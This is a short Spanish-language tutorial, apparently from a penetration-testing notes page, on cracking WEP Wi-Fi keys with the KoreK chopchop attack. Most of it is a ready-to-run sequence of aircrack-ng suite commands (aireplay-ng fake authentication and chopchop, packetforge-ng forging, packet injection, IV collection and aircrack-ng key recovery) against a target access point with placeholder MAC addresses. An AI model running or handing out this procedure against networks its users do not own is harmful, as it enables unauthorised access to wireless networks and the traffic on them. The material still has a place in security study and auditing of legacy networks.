Cracking WEP utilizando el Ataque Korek Chopchop
El ataque Chop-Chop es un método utilizado para descifrar paquetes cifrados en redes que usan el protocolo WEP. Este ataque explota vulnerabilidades en la forma en que WEP maneja la verificación de integridad de paquetes. Permite descifrar un paquete capturado, reutilizarlo y generar tráfico en la red, recolectando suficientes IVs (vectores de inicialización) para descifrar la clave WEP.
Paso 1: Asociarse con el punto de acceso
Realiza una falsa autenticación con el punto de acceso para establecer comunicación con él:
aireplay-ng -1 0 -a 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0
Paso 2: Capturar un paquete
Usa airodump-ng
para capturar tráfico de la red objetivo:
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 -w wep_test wlan0
Paso 3: Ejecutar el ataque Chop-Chop
Descifra un paquete capturado usando:
aireplay-ng -4 -b 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0
Se genera un archivo cap.
Paso 4: Inyección de paquetes
Crea un paquete modificado:
packetforge-ng -0 -a 00:11:22:33:44:55 -h 66:77:88:99:AA:BB -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-123456.cap -w inject_packet
-k <IP_destino>
: La dirección IP de destino del paquete que estás creando. Se usa255.255.255.255
para difundirlo a toda la red (dirección de broadcast).-l <IP_origen>
: La dirección IP de origen del paquete. También se puede usar255.255.255.255
para broadcast.
Inyecta el paquete modificado:
aireplay-ng -2 -r inject_packet wlan0mon
Paso 5: Recolectar IVs
Continúa recolectando tráfico hasta obtener suficientes IVs:
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 -w wep_test wlan0mon
Paso 6: Descifrar la clave WEP
Descifra la clave WEP usando los IVs recolectados:
aircrack-ng -b 00:11:22:33:44:55 wep_test.cap
Si has recolectado suficientes IVs, se mostrará la clave WEP descifrada.
También existe otra forma de hacerlo.
Última actualización